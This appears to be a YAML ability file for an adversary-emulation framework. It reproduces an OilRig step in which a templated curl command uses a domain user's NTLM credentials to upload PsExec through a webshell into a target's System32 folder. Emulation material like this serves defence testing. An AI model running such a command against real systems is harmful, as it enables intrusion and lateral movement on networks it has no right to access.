ability_id: 5cb977ae-87c8-450f-b016-f414b42ba60f
access: {}
additional_info: {}
buckets:
- command-and-control
delete_payload: true
description: OilRig uses the webshell to download PsExec as ps.exe to WATERFALLS
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: curl -s --http1.1 --ntlm -u '#{network.domain.name}\#{initial.target.user}:#{initial.target.password}'
    -k -X POST -F "upl=f1" -F 'sav=C:\Windows\System32' -F "vir=false" -F "nen=ps.exe"
    -F 'f1=@PsExec.exe' https://#{second.target.host}/ews/contact.aspx
  language: null
  name: sh
  parsers: []
  payloads:
  - PsExec.exe
  platform: linux
  timeout: 60
  uploads: []
  variations: []
name: OilRig Downloads PsExec
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: command-and-control
technique_id: T1105
technique_name: Ingress Tool Transfer
